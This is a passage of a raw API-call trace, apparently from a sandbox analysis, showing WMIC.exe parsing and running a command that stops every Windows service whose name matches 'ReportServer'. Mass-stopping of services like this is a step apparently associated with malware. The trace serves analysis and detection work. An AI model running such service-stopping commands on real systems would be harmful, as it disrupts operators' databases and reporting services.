attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.692] malloc (_Size=0x18) returned 0x3ec9e0 [0259.692] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.692] free (_Block=0x3ec9e0) [0259.692] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0259.693] malloc (_Size=0x18) returned 0x3ec9e0 [0259.693] malloc (_Size=0x18) returned 0x3eca00 [0259.693] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0259.693] SysStringLen (param_1="TABLE") returned 0x5 [0259.693] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0259.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.693] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0259.693] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.693] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0259.693] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.693] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.693] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0259.693] malloc (_Size=0x30) returned 0x3e8540 [0259.693] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.693] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.693] IUnknown:Release (This=0x232a280) returned 0x0 [0259.693] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=20, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.693] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="textvaluelist.xsl") returned 0x0 [0259.693] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.693] malloc (_Size=0x18) returned 0x3eca20 [0259.693] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.694] free (_Block=0x3eca20) [0259.694] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0259.694] malloc (_Size=0x18) returned 0x3eca20 [0259.694] malloc (_Size=0x18) returned 0x3eca40 [0259.695] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0259.695] SysStringLen (param_1="TABLE") returned 0x5 [0259.695] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0259.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0259.695] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0259.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0259.695] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0259.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.695] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0259.695] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0259.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0259.695] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0259.695] malloc (_Size=0x30) returned 0x3e8580 [0259.695] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.695] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.695] IUnknown:Release (This=0x232a280) returned 0x0 [0259.695] IUnknown:Release (This=0x2329cc0) returned 0x0 [0259.695] FreeThreadedDOMDocument:IUnknown:Release (This=0x232bc50) returned 0x1 [0259.695] FreeThreadedDOMDocument:IUnknown:Release (This=0x23271d0) returned 0x0 [0259.695] free (_Block=0x3e6f70) [0259.695] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" [0259.695] malloc (_Size=0xe0) returned 0x3ecd30 [0259.695] memcpy_s (in: _Destination=0x3ecd30, _DestinationSize=0xde, _Source=0x2025ee, _SourceSize=0xda | out: _Destination=0x3ecd30) returned 0x0 [0259.696] malloc (_Size=0x18) returned 0x3eca60 [0259.696] malloc (_Size=0x18) returned 0x3eca80 [0259.696] malloc (_Size=0x18) returned 0x3ecaa0 [0259.696] malloc (_Size=0x18) returned 0x3ecac0 [0259.696] malloc (_Size=0x80) returned 0x3e6f70 [0259.697] GetLocalTime (in: lpSystemTime=0x1cf9f0 | out: lpSystemTime=0x1cf9f0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x11, wMilliseconds=0x356)) [0259.697] _vsnwprintf (in: _Buffer=0x3e6f70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cf948 | out: _Buffer="04-28-2020T20:42:17") returned 19 [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] malloc (_Size=0x96) returned 0x3ece20 [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] malloc (_Size=0x96) returned 0x3ecec0 [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] malloc (_Size=0xa) returned 0x3ecae0 [0259.697] lstrlenW (lpString="path") returned 4 [0259.697] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0259.697] malloc (_Size=0xa) returned 0x3ecb00 [0259.697] malloc (_Size=0x8) returned 0x3e7000 [0259.697] free (_Block=0x0) [0259.697] free (_Block=0x3ecae0) [0259.697] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.697] malloc (_Size=0x1c) returned 0x3ecf60 [0259.697] lstrlenW (lpString="Win32_Service") returned 13 [0259.697] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0259.697] malloc (_Size=0x1c) returned 0x3ecf90 [0259.697] malloc (_Size=0x10) returned 0x3ecae0 [0259.697] memmove_s (in: _Destination=0x3ecae0, _DestinationSize=0x8, _Source=0x3e7000, _SourceSize=0x8 | out: _Destination=0x3ecae0) returned 0x0 [0259.697] free (_Block=0x3e7000) [0259.697] free (_Block=0x0) [0259.698] free (_Block=0x3ecf60) [0259.698] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.698] malloc (_Size=0xc) returned 0x3ecb20 [0259.698] lstrlenW (lpString="where") returned 5 [0259.698] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0259.698] malloc (_Size=0xc) returned 0x3ecb40 [0259.698] malloc (_Size=0x18) returned 0x3ecb60 [0259.698] memmove_s (in: _Destination=0x3ecb60, _DestinationSize=0x10, _Source=0x3ecae0, _SourceSize=0x10 | out: _Destination=0x3ecb60) returned 0x0 [0259.698] free (_Block=0x3ecae0) [0259.698] free (_Block=0x0) [0259.698] free (_Block=0x3ecb20) [0259.698] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.698] malloc (_Size=0x3e) returned 0x3ecfc0 [0259.698] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0259.698] _wcsicmp (_String1="\"name like '%%ReportServer%%'\"", _String2="\"NULL\"") returned -20 [0259.698] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0259.698] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0259.698] malloc (_Size=0x3e) returned 0x3ed010 [0259.698] malloc (_Size=0x20) returned 0x3ecf60 [0259.698] memmove_s (in: _Destination=0x3ecf60, _DestinationSize=0x18, _Source=0x3ecb60, _SourceSize=0x18 | out: _Destination=0x3ecf60) returned 0x0 [0259.698] free (_Block=0x3ecb60) [0259.698] free (_Block=0x0) [0259.698] free (_Block=0x3ecfc0) [0259.698] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.698] malloc (_Size=0xa) returned 0x3ecb60 [0259.698] lstrlenW (lpString="call") returned 4 [0259.698] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0259.698] malloc (_Size=0xa) returned 0x3ecb20 [0259.698] malloc (_Size=0x30) returned 0x3e85c0 [0259.698] memmove_s (in: _Destination=0x3e85c0, _DestinationSize=0x20, _Source=0x3ecf60, _SourceSize=0x20 | out: _Destination=0x3e85c0) returned 0x0 [0259.698] free (_Block=0x3ecf60) [0259.698] free (_Block=0x0) [0259.699] free (_Block=0x3ecb60) [0259.699] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0259.699] malloc (_Size=0x18) returned 0x3ecb60 [0259.699] lstrlenW (lpString="stopservice") returned 11 [0259.699] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0259.699] malloc (_Size=0x18) returned 0x3ecae0 [0259.699] free (_Block=0x0) [0259.699] free (_Block=0x3ecb60) [0259.699] malloc (_Size=0x30) returned 0x3e8600 [0259.699] lstrlenW (lpString="QUIT") returned 4 [0259.699] lstrlenW (lpString="path") returned 4 [0259.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0259.699] lstrlenW (lpString="EXIT") returned 4 [0259.699] lstrlenW (lpString="path") returned 4 [0259.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0259.699] free (_Block=0x3e8600) [0259.699] WbemLocator:IUnknown:AddRef (This=0x1e11390) returned 0x2 [0259.699] malloc (_Size=0x30) returned 0x3e8600 [0259.699] lstrlenW (lpString="/") returned 1 [0259.699] lstrlenW (lpString="path") returned 4 [0259.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0259.699] lstrlenW (lpString="-") returned 1 [0259.699] lstrlenW (lpString="path") returned 4 [0259.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0259.699] lstrlenW (lpString="CLASS") returned 5 [0259.699] lstrlenW (lpString="path") returned 4 [0259.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0259.699] lstrlenW (lpString="PATH") returned 4 [0259.699] lstrlenW (lpString="path") returned 4 [0259.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0259.699] lstrlenW (lpString="/") returned 1 [0259.699] lstrlenW (lpString="Win32_Service") returned 13 [0259.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0259.700] lstrlenW (lpString="-") returned 1 [0259.700] lstrlenW (lpString="Win32_Service") returned 13 [0259.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0259.700] lstrlenW (lpString="Win32_Service") returned 13 [0259.700] malloc (_Size=0x1c) returned 0x3ecf60 [0259.700] lstrlenW (lpString="Win32_Service") returned 13 [0259.700] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0259.700] lstrlenW (lpString="Win32_Service") returned 13 [0259.700] malloc (_Size=0x1c) returned 0x3ecfc0 [0259.700] lstrlenW (lpString="Win32_Service") returned 13 [0259.700] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffde0890 | out: _String=0x0, _Context=0xffffffffffde0890) returned 0x0 [0259.700] lstrlenW (lpString="") returned 0 [0259.700] lstrlenW (lpString="WHERE") returned 5 [0259.700] lstrlenW (lpString="where") returned 5 [0259.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0259.700] lstrlenW (lpString="/") returned 1 [0259.700] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0259.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="/", cchCount2=1) returned 3 [0259.700] lstrlenW (lpString="-") returned 1 [0259.700] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0259.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="-", cchCount2=1) returned 3 [0259.700] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0259.700] malloc (_Size=0x3a) returned 0x3ed060 [0259.700] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0259.700] lstrlenW (lpString="/") returned 1 [0259.700] lstrlenW (lpString="call") returned 4 [0259.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0259.701] lstrlenW (lpString="-") returned 1 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] malloc (_Size=0xa) returned 0x3ecb60 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] lstrlenW (lpString="GET") returned 3 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0259.701] lstrlenW (lpString="LIST") returned 4 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0259.701] lstrlenW (lpString="SET") returned 3 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0259.701] lstrlenW (lpString="CREATE") returned 6 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0259.701] lstrlenW (lpString="CALL") returned 4 [0259.701] lstrlenW (lpString="call") returned 4 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0259.701] lstrlenW (lpString="/") returned 1 [0259.701] lstrlenW (lpString="stopservice") returned 11 [0259.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0259.701] lstrlenW (lpString="-") returned 1 [0259.702] lstrlenW (lpString="stopservice") returned 11 [0259.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0259.702] lstrlenW (lpString="stopservice") returned 11 [0259.702] malloc (_Size=0x18) returned 0x3ecb80 [0259.702] lstrlenW (lpString="stopservice") returned 11 [0259.702] ??0CHString@@QEAA@XZ () returned 0x1cd598 [0259.702] GetCurrentThreadId () returned 0x330 [0259.702] GetCurrentThreadId () returned 0x330 [0259.702] ??0CHString@@QEAA@XZ () returned 0x1cd368 [0259.702] malloc (_Size=0x8) returned 0x3ecff0 [0259.702] malloc (_Size=0x18) returned 0x3ecba0 [0259.703] malloc (_Size=0x18) returned 0x3ecbc0 [0259.703] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e11390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff3c2950 | out: ppNamespace=0xff3c2950*=0x1e23a98) returned 0x0 [0259.737] free (_Block=0x3ecbc0) [0259.737] CoSetProxyBlanket (pProxy=0x1e23a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0259.738] free (_Block=0x3ecff0) [0259.738] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.738] free (_Block=0x3ecba0) [0259.745] malloc (_Size=0x18) returned 0x3ecba0 [0259.745] IWbemServices:GetObject (in: This=0x1e23a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1cd578*=0x0, ppCallResult=0x0 | out: ppObject=0x1cd578*=0x1e4bfa0, ppCallResult=0x0) returned 0x0 [0259.771] free (_Block=0x3ecba0) [0259.771] IWbemClassObject:BeginMethodEnumeration (This=0x1e4bfa0, lEnumFlags=0) returned 0x0 [0259.771] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="StartService", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c4a0) returned 0x0 [0259.771] lstrlenW (lpString="StartService") returned 12 [0259.771] lstrlenW (lpString="stopservice") returned 11 [0259.771] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0259.771] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0259.771] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="StopService", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c4a0) returned 0x0 [0259.771] lstrlenW (lpString="StopService") returned 11 [0259.772] lstrlenW (lpString="stopservice") returned 11 [0259.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0259.772] malloc (_Size=0x70) returned 0x3ed0b0 [0259.772] ??0CHString@@QEAA@XZ () returned 0x1ccf28 [0259.772] GetCurrentThreadId () returned 0x330 [0259.772] IWbemClassObject:GetNames (in: This=0x1e4c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x1ccf20 | out: pNames=0x1ccf20*="\x01ƀ\x08") returned 0x0 [0259.772] SafeArrayGetLBound (in: psa=0x2a4af0, nDim=0x1, plLbound=0x1ccf38 | out: plLbound=0x1ccf38) returned 0x0 [0259.772] SafeArrayGetUBound (in: psa=0x2a4af0, nDim=0x1, plUbound=0x1ccf34 | out: plUbound=0x1ccf34) returned 0x0 [0259.772] SafeArrayGetElement (in: psa=0x2a4af0, rgIndices=0x1ccf14, pv=0x1ccf18 | out: pv=0x1ccf18) returned 0x0 [0259.772] malloc (_Size=0x48) returned 0x3ed130 [0259.772] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1e4c4a0, wszProperty="ReturnValue", ppQualSet=0x1ccd68 | out: ppQualSet=0x1ccd68*=0x1e113b0) returned 0x0 [0259.773] malloc (_Size=0x18) returned 0x3ecba0 [0259.773] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="CIMTYPE", lFlags=0, pVal=0x1ccdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x1ccdf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0259.773] free (_Block=0x3ecba0) [0259.773] malloc (_Size=0x18) returned 0x3ecba0 [0259.773] IWbemClassObject:Get (in: This=0x1e4c4a0, wszName="ReturnValue", lFlags=0, pVal=0x1cce98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1ccd78*=1887680, plFlavor=0x0 | out: pVal=0x1cce98*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1ccd78*=19, plFlavor=0x0) returned 0x0 [0259.773] malloc (_Size=0x18) returned 0x3ecbc0 [0259.773] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="read", lFlags=0, pVal=0x1ccd80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff3c2ac0), plFlavor=0x0 | out: pVal=0x1ccd80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff3c2ac0), plFlavor=0x0) returned 0x80041002 [0259.773] free (_Block=0x3ecbc0) [0259.773] malloc (_Size=0x18) returned 0x3ecbc0 [0259.773] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="write", lFlags=0, pVal=0x1ccd80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff3c2ac0), plFlavor=0x0 | out: pVal=0x1ccd80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff3c2ac0), plFlavor=0x0) returned 0x80041002 [0259.773] free (_Block=0x3ecbc0) [0259.773] malloc (_Size=0x18) returned 0x3ecbc0 [0259.774] malloc (_Size=0x18) returned 0x3ecbe0 [0259.774] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="Description", lFlags=0, pVal=0x1cce30*(varType=0x0, wReserved1=0x1c, wReserved2=0x0, wReserved3=0x0, varVal1=0xff364293, varVal2=0x1cce38), plFlavor=0x0 | out: pVal=0x1cce30*(varType=0x0, wReserved1=0x1c, wReserved2=0x0, wReserved3=0x0, varVal1=0xff364293, varVal2=0x1cce38), plFlavor=0x0) returned 0x80041002 [0259.774] free (_Block=0x3ecbe0) [0259.774] malloc (_Size=0x18) returned 0x3ecbe0 [0259.774] lstrlenA (lpString="Not Available") returned 13 [0259.774] malloc (_Size=0x1c) returned 0x3ed180 [0259.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3522f0, cbMultiByte=-1, lpWideCharStr=0x3ed180, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0259.774] free (_Block=0x3ed180) [0259.774] IUnknown:Release (This=0x1e113b0) returned 0x0 [0259.774] malloc (_Size=0x48) returned 0x3ed180 [0259.774] malloc (_Size=0x18) returned 0x3ecc00 [0259.774] malloc (_Size=0x48) returned 0x3ed1d0 [0259.774] malloc (_Size=0x70) returned 0x3ed220 [0259.774] malloc (_Size=0x48) returned 0x3ed2a0 [0259.774] free (_Block=0x3ed1d0) [0259.774] free (_Block=0x3ed180) [0259.774] free (_Block=0x3ed130) [0259.774] free (_Block=0x3ecbc0) [0259.775] free (_Block=0x3ecbe0) [0259.775] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.775] IWbemClassObject:GetMethodQualifierSet (in: This=0x1e4bfa0, wszMethod="StopService", ppQualSet=0x1cd498 | out: ppQualSet=0x1cd498*=0x1e113b0) returned 0x0 [0259.775] malloc (_Size=0x18) returned 0x3ecbe0 [0259.775] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="Implemented", lFlags=0, pVal=0x1cd4a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41785710c0, varVal2=0xff3644fb), plFlavor=0x0 | out: pVal=0x1cd4a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41785710c0, varVal2=0xff3644fb), plFlavor=0x0) returned 0x80041002 [0259.775] free (_Block=0x3ecbe0) [0259.775] malloc (_Size=0x18) returned 0x3ecbe0 [0259.775] malloc (_Size=0x18) returned 0x3ecbc0 [0259.775] IWbemQualifierSet:Get (in: This=0x1e113b0, wszName="Description", lFlags=0, pVal=0x1cd4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3c2948, varVal2=0x330), plFlavor=0x0 | out: pVal=0x1cd4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x330), plFlavor=0x0) returned 0x0 [0259.775] free (_Block=0x3ecbc0) [0259.775] malloc (_Size=0x18) returned 0x3ecbc0 [0259.776] IUnknown:Release (This=0x1e113b0) returned 0x0 [0259.776] malloc (_Size=0x70) returned 0x3ed130 [0259.776] malloc (_Size=0x70) returned 0x3ed2f0 [0259.776] malloc (_Size=0x48) returned 0x3ed1b0 [0259.776] malloc (_Size=0x18) returned 0x3ecc20 [0259.776] malloc (_Size=0x70) returned 0x3ed370 [0259.776] malloc (_Size=0x70) returned 0x3ed3f0 [0259.776] malloc (_Size=0x48) returned 0x3ed470 [0259.776] malloc (_Size=0x50) returned 0x3ed4c0 [0259.776] malloc (_Size=0x70) returned 0x3ed520 [0259.776] malloc (_Size=0x70) returned 0x3ed5a0 [0259.776] malloc (_Size=0x48) returned 0x3ed620 [0259.776] free (_Block=0x3ed470) [0259.776] free (_Block=0x3ed3f0) [0259.776] free (_Block=0x3ed370) [0259.776] free (_Block=0x3ed1b0) [0259.776] free (_Block=0x3ed2f0) [0259.776] free (_Block=0x3ed130) [0259.776] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0259.777] free (_Block=0x3ed2a0) [0259.777] free (_Block=0x3ed220) [0259.777] free (_Block=0x3ed0b0) [0259.777] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="PauseService", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c4a0) returned 0x0 [0259.777] lstrlenW (lpString="PauseService") returned 12 [0259.777] lstrlenW (lpString="stopservice") returned 11 [0259.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0259.777] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0259.777] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="ResumeService", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c4a0) returned 0x0 [0259.777] lstrlenW (lpString="ResumeService") returned 13 [0259.777] lstrlenW (lpString="stopservice") returned 11 [0259.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0259.777] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0259.777] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="InterrogateService", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c4a0) returned 0x0 [0259.777] lstrlenW (lpString="InterrogateService") returned 18 [0259.777] lstrlenW (lpString="stopservice") returned 11 [0259.777] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0259.777] IUnknown:Release 